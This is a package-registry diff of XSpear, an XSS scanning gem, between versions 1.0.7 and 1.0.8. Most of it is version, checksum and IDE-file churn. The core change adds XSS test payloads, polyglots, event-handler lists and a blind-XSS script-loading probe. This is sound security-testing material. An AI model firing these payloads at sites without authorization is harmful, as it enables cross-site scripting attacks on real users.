XSpear 1.0.7 → 1.0.8

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (6) hide show
  1. checksums.yaml +4 -4
  2. data/.idea/workspace.xml +28 -24
  3. data/README.md +2 -2
  4. data/lib/XSpear/version.rb +1 -1
  5. data/lib/XSpear.rb +52 -3
  6. metadata +2 -2
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 0c0ac315484162b92f2f958d2ddc70736bec0f164349575529e763f154366c37
4
- data.tar.gz: eab6a1c2350ea1bf4467fcd41cfd00a61c58d1693503e4437ae86418e348bda1
3
+ metadata.gz: 6921327dc742a1fe07a1daf76f20272a50f5fc6d8ecd73bf4f2ef9eed6d0d98d
4
+ data.tar.gz: 3344443259fa53fe61fc57baefed0f81891e8badd048c9098c4c69a8b33ea1fe
5
5
  SHA512:
6
- metadata.gz: e4463bb21d6b1cf918c290d7a3540d93510f4f9cb68ebc6fad7319377d579228aa754b832e5d077f63e24b35d2ea73fa492a4a21351c0f26880b6c1f52065016
7
- data.tar.gz: bf64aa0df617fdddfb8d07803a8dbba0bb2822579b56fbc93a0d17f73aced699ad2f46bfd01a51ae9e614d3287b016e2419eaba35384e17d76c038c3ea52d567
6
+ metadata.gz: da21a77b8132168cf8068f7cde102b4dac72d332db5a62f75fff701d258ef3e636fdcabfaabee1ecc159f5b7fb5223b86016ce59264fdee6a104b1f6725d01da
7
+ data.tar.gz: c1bcef3a187eef64530b717527316f6f674387de7eda895fa6420c6e3de5d0eff103ac9ef359162cc89c9d91a77f12af6c8d7ad47e857b5632794ce8eeb50f53
data/.idea/workspace.xml CHANGED
@@ -3,10 +3,7 @@
3
3
  <component name="ChangeListManager">
4
4
  <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
5
5
  <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
6
- <change beforePath="$PROJECT_DIR$/README.md" beforeDir="false" afterPath="$PROJECT_DIR$/README.md" afterDir="false" />
7
6
  <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
8
- <change beforePath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" afterDir="false" />
9
- <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
10
7
  </list>
11
8
  <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
12
9
  <option name="SHOW_DIALOG" value="false" />
@@ -36,20 +33,20 @@
36
33
  <provider selected="true" editor-type-id="text-editor" />
37
34
  </entry>
38
35
  </file>
39
- <file pinned="false" current-in-tab="false">
36
+ <file pinned="false" current-in-tab="true">
40
37
  <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
41
38
  <provider selected="true" editor-type-id="text-editor">
42
- <state relative-caret-position="426">
43
- <caret line="181" column="31" lean-forward="true" selection-start-line="181" selection-start-column="31" selection-end-line="181" selection-end-column="31" />
39
+ <state relative-caret-position="381">
40
+ <caret line="402" lean-forward="true" selection-start-line="402" selection-end-line="402" />
44
41
  </state>
45
42
  </provider>
46
43
  </entry>
47
44
  </file>
48
- <file pinned="false" current-in-tab="true">
45
+ <file pinned="false" current-in-tab="false">
49
46
  <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
50
47
  <provider selected="true" editor-type-id="text-editor">
51
- <state relative-caret-position="253">
52
- <caret line="41" column="29" selection-start-line="41" selection-start-column="29" selection-end-line="41" selection-end-column="29" />
48
+ <state relative-caret-position="-176">
49
+ <caret line="34" column="99" selection-start-line="34" selection-start-column="99" selection-end-line="34" selection-end-column="99" />
53
50
  </state>
54
51
  </provider>
55
52
  </entry>
@@ -114,12 +111,12 @@
114
111
  <option value="$PROJECT_DIR$/exe/XSpear" />
115
112
  <option value="$PROJECT_DIR$/README.md" />
116
113
  <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
117
- <option value="$PROJECT_DIR$/lib/XSpear.rb" />
118
114
  <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
115
+ <option value="$PROJECT_DIR$/lib/XSpear.rb" />
119
116
  </list>
120
117
  </option>
121
118
  </component>
122
- <component name="ProjectFrameBounds">
119
+ <component name="ProjectFrameBounds" fullScreen="true">
123
120
  <option name="x" value="-1920" />
124
121
  <option name="y" value="-620" />
125
122
  <option name="width" value="1920" />
@@ -230,7 +227,7 @@
230
227
  <workItem from="1562942816004" duration="15337000" />
231
228
  <workItem from="1563638656518" duration="4985000" />
232
229
  <workItem from="1563809961097" duration="4237000" />
233
- <workItem from="1563893538891" duration="3583000" />
230
+ <workItem from="1563893538891" duration="6879000" />
234
231
  </task>
235
232
  <task id="LOCAL-00001" summary="init update">
236
233
  <created>1562945899597</created>
@@ -498,14 +495,21 @@
498
495
  <option name="project" value="LOCAL" />
499
496
  <updated>1563896886094</updated>
500
497
  </task>
501
- <option name="localTasksCounter" value="39" />
498
+ <task id="LOCAL-00039" summary="(1.0.7) Releases 1.0.7 (Modify Format, etc..)">
499
+ <created>1563897379180</created>
500
+ <option name="number" value="00039" />
501
+ <option name="presentableId" value="LOCAL-00039" />
502
+ <option name="project" value="LOCAL" />
503
+ <updated>1563897379180</updated>
504
+ </task>
505
+ <option name="localTasksCounter" value="40" />
502
506
  <servers />
503
507
  </component>
504
508
  <component name="TimeTrackingManager">
505
- <option name="totallyTimeSpent" value="28142000" />
509
+ <option name="totallyTimeSpent" value="31438000" />
506
510
  </component>
507
511
  <component name="ToolWindowManager">
508
- <frame x="-1920" y="-620" width="1920" height="1057" extended-state="0" />
512
+ <frame x="-1920" y="-643" width="1920" height="1080" extended-state="0" />
509
513
  <editor active="true" />
510
514
  <layout>
511
515
  <window_info content_ui="combo" id="Project" order="0" visible="true" weight="0.16400427" />
@@ -521,7 +525,7 @@
521
525
  <window_info anchor="bottom" id="Docker" order="7" show_stripe_button="false" />
522
526
  <window_info anchor="bottom" id="Database Changes" order="8" />
523
527
  <window_info anchor="bottom" id="Version Control" order="9" />
524
- <window_info active="true" anchor="bottom" id="Terminal" order="10" visible="true" weight="0.29637307" />
528
+ <window_info active="true" anchor="bottom" id="Terminal" order="10" visible="true" weight="0.34158415" />
525
529
  <window_info anchor="bottom" id="Event Log" order="11" side_tool="true" />
526
530
  <window_info anchor="bottom" id="Messages" order="12" weight="0.32953367" />
527
531
  <window_info anchor="right" id="Commander" internal_type="SLIDING" order="0" type="SLIDING" weight="0.4" />
@@ -534,7 +538,6 @@
534
538
  <option name="version" value="1" />
535
539
  </component>
536
540
  <component name="VcsManagerConfiguration">
537
- <MESSAGE value="edit gem dependency(runtime, developement)" />
538
541
  <MESSAGE value="Add json report and new build binary, edit readme" />
539
542
  <MESSAGE value="Add screenshot images" />
540
543
  <MESSAGE value="Add dependency gems descriptions" />
@@ -559,7 +562,8 @@
559
562
  <MESSAGE value="(1.0.6)[fixed #5] Add blind-xss other pattern" />
560
563
  <MESSAGE value="(1.0.6) Releases 1.0.6 version" />
561
564
  <MESSAGE value="(1.0.6) Edit README.md" />
562
- <option name="LAST_COMMIT_MESSAGE" value="(1.0.6) Edit README.md" />
565
+ <MESSAGE value="(1.0.7) Releases 1.0.7 (Modify Format, etc..)" />
566
+ <option name="LAST_COMMIT_MESSAGE" value="(1.0.7) Releases 1.0.7 (Modify Format, etc..)" />
563
567
  </component>
564
568
  <component name="editorHistoryManager">
565
569
  <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -629,17 +633,17 @@
629
633
  </state>
630
634
  </provider>
631
635
  </entry>
632
- <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
636
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
633
637
  <provider selected="true" editor-type-id="text-editor">
634
- <state relative-caret-position="426">
635
- <caret line="181" column="31" lean-forward="true" selection-start-line="181" selection-start-column="31" selection-end-line="181" selection-end-column="31" />
638
+ <state relative-caret-position="-176">
639
+ <caret line="34" column="99" selection-start-line="34" selection-start-column="99" selection-end-line="34" selection-end-column="99" />
636
640
  </state>
637
641
  </provider>
638
642
  </entry>
639
- <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
643
+ <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
640
644
  <provider selected="true" editor-type-id="text-editor">
641
- <state relative-caret-position="253">
642
- <caret line="41" column="29" selection-start-line="41" selection-start-column="29" selection-end-line="41" selection-end-column="29" />
645
+ <state relative-caret-position="381">
646
+ <caret line="402" lean-forward="true" selection-start-line="402" selection-end-line="402" />
643
647
  </state>
644
648
  </provider>
645
649
  </entry>
data/README.md CHANGED
@@ -134,7 +134,7 @@ __((_)(_)) /(/( /((_))(_))(()\
134
134
  |_| \ /<
135
135
  {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
136
136
  / \<
137
- \> [ v1.0.6 ]
137
+ \> [ v1.0.7 ]
138
138
  [*] creating a test query.
139
139
  [*] test query generation is complete. [149 query]
140
140
  [*] starting test and analysis. [10 threads]
@@ -297,5 +297,5 @@ The gem is available as open source under the terms of the [MIT License](https:/
297
297
  Everyone interacting in the XSpear project’s codebases, issue trackers, chat rooms and mailing lists is expected to follow the [code of conduct](https://github.com/[USERNAME]/XSpear/blob/master/CODE_OF_CONDUCT.md).
298
298
 
299
299
  ## ScreenShot
300
- <img src="https://user-images.githubusercontent.com/13212227/61726530-bf7aff80-adac-11e9-9ed8-ac8ecd358c0c.png" width=100%>
300
+ <img src="https://user-images.githubusercontent.com/13212227/61727892-1681d400-adaf-11e9-832d-37547006f778.png" width=100%>
301
301
  <img src="https://user-images.githubusercontent.com/13212227/61311071-8b459300-a830-11e9-8e60-c08e984fdacb.png" width=100%>
data/lib/XSpear/version.rb CHANGED
@@ -1,3 +1,3 @@
1
1
  module XSpear
2
- VERSION = "1.0.7"
2
+ VERSION = "1.0.8"
3
3
  end
data/lib/XSpear.rb CHANGED
@@ -247,6 +247,7 @@ class XspearScan
247
247
  'onKeyUp',
248
248
  'onLayoutComplete',
249
249
  'onLoad',
250
+ 'onloadstart',
250
251
  'onLoseCapture',
251
252
  'onMediaComplete',
252
253
  'onMediaError',
@@ -297,7 +298,10 @@ class XspearScan
297
298
  'onTrackChange',
298
299
  'onUndo',
299
300
  'onUnload',
300
- 'onURLFlip'
301
+ 'onURLFlip',
302
+ 'ontouchstart',
303
+ 'ontouchend',
304
+ 'ontouchmove'
301
305
  ]
302
306
  tags = [
303
307
  "script",
@@ -308,10 +312,11 @@ class XspearScan
308
312
  "audio",
309
313
  "meta",
310
314
  "object",
311
- "embeded",
315
+ "embed",
312
316
  "style",
313
317
  "frame",
314
- "frameset"
318
+ "frameset",
319
+ "applet"
315
320
  ]
316
321
  special_chars =[
317
322
  ">",
@@ -335,6 +340,24 @@ class XspearScan
335
340
  "=",
336
341
  "$"
337
342
  ]
343
+ useful_code = [
344
+ "javascript:",
345
+ "JaVasCriPt:",
346
+ "jaVas%0dcRipt:",
347
+ "jaVas%0acRipt:",
348
+ "jaVas%09cRipt:",
349
+ "data:",
350
+ "alert(",
351
+ "alert`",
352
+ "prompt(",
353
+ "prompt`",
354
+ "confirm(",
355
+ "confirm`",
356
+ "document.location",
357
+ "document.cookie",
358
+ "window.location"
359
+ ]
360
+
338
361
 
339
362
  log('s', 'creating a test query.')
340
363
  r.push makeQueryPattern('s', '', '', 'i', "-", CallbackCheckHeaders)
@@ -357,17 +380,43 @@ class XspearScan
357
380
  end
358
381
 
359
382
  # Check Common XSS Payloads
383
+ onfocus_tags = [
384
+ "input",
385
+ "select",
386
+ "textarea",
387
+ "keygen"
388
+ ]
360
389
  r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
361
390
  r.push makeQueryPattern('x', '<svg/onload=alert(45)>', '<svg/onload=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
362
391
  r.push makeQueryPattern('x', '<img/src onerror=alert(45)>', '<img/src onerror=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
392
+ r.push makeQueryPattern('x', '"><scr<script>ipt>alert(45)</scr<script>ipt>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
363
393
  r.push makeQueryPattern('x', '"><iframe/src=JavaScriPt:alert(45)>', '"><iframe/src=JavaScriPt:alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
394
+ r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
395
+ r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert`45`">', '<details/open/ontoggle="alert`45`">', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
396
+ r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
397
+ r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
398
+ r.push makeQueryPattern('x', '"\'><meter value=2 min=0 max=10 onmouseover=alert(45)>2 out of 10</meter>', '<meter value=2 min=0 max=10 onmouseover=alert(45)>2 out of 10</meter>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
399
+
400
+ onfocus_tags.each do |t|
401
+ r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)
402
+ end
403
+
404
+ # Check Selenium Payloads
364
405
  r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered "+"<script>alert(45)</script>".red, CallbackXSSSelenium)
406
+ r.push makeQueryPattern('x', '"><svg onload=alert(1)>', '<svg onload=alert(1)>', 'v', "triggered "+"<svg onload=alert(1)> (x0c)".red, CallbackXSSSelenium)
365
407
  r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered "+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
366
408
  r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
409
+ r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "triggered "+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
410
+ r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert(45)">', '<details/open/ontoggle="alert(45)">', 'h', "triggered "+"<details/open/ontoggle=\"alert(45)\">".red, CallbackXSSSelenium)
411
+ r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "triggered "+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
412
+ r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "triggered "+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
413
+
414
+ # Check Selenium Polyglot
367
415
  r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
368
416
  r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//-->&lt;<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
369
417
  r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
370
418
 
419
+
371
420
  # Check Blind XSS Payload
372
421
  if !@blind_url.nil?
373
422
  r.push makeQueryPattern('f', "\"'><script src=#{@blind_url}></script>", "NOTDETECTED", 'i', "", CallbackNotAdded)
metadata CHANGED
@@ -1,14 +1,14 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: XSpear
3
3
  version: !ruby/object:Gem::Version
4
- version: 1.0.7
4
+ version: 1.0.8
5
5
  platform: ruby
6
6
  authors:
7
7
  - hahwul
8
8
  autorequire:
9
9
  bindir: exe
10
10
  cert_chain: []
11
- date: 2019-07-23 00:00:00.000000000 Z
11
+ date: 2019-07-24 00:00:00.000000000 Z
12
12
  dependencies:
13
13
  - !ruby/object:Gem::Dependency
14
14
  name: colorize